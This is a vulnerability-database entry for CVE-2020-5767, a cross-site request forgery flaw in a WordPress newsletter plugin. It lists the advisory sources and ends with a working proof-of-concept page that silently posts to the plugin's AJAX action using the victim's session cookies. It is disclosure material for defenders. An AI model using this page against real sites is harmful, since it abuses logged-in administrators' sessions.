Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email() vulnerability
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Cvelist | CVE-2020-5767 | 17 Jul 2020 21:22 | – | cvelist |
Patchstack | WordPress Email Subscribers & Newsletters plugin <= 4.5.0.1 - Cross-Site Request Forgery (CSRF) vulnerability | 17 Jul 2020 00:00 | – | patchstack |
Prion | Cross site request forgery (csrf) | 17 Jul 2020 22:15 | – | prion |
CVE | CVE-2020-5767 | 17 Jul 2020 22:15 | – | cve |
WPVulnDB | Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email() | 18 Jul 2020 00:00 | – | wpvulndb |
NVD | CVE-2020-5767 | 17 Jul 2020 22:15 | – | nvd |
OpenVAS | WordPress Email Subscribers Plugin < 4.5.1 Multiple Vulnerabilities | 21 Jul 2020 00:00 | – | openvas |
Tenable Nessus | WordPress Plugin 'Email Subscribers & Newsletters' Multiple Vulnerabilities | 27 Aug 2020 00:00 | – | nessus |
Source | Link |
---|---|
tenable | www.tenable.com/security/research/tra-2020-44-0 |
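```html
<!DOCTYPE html>
<html>
<body onload="run()">
<script>
// Proof of concept: when a user with an active WordPress session loads this page,
// the browser sends a cross-origin POST to the plugin's AJAX action.
function run() {
  var targetUrl = "http://example.com/webpage";
  var email = "[email protected]";
  var subject = "PoC";
  var content = "add content here";
  var xhttp = new XMLHttpRequest();
  // The body carries no nonce, only the e-mail fields and the action name.
  var data = "es_test_email=" + email + "&subject=" + subject + "&content=" + content + "&action=es_send_test_email";
  var url = targetUrl + "/wp-admin/admin-ajax.php?";
  var method = "POST";
  xhttp.open(method, url);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  // Attach the session cookies to the cross-origin request.
  xhttp.withCredentials = true;
  xhttp.send(data);
}
</script>
</body>
</html>
```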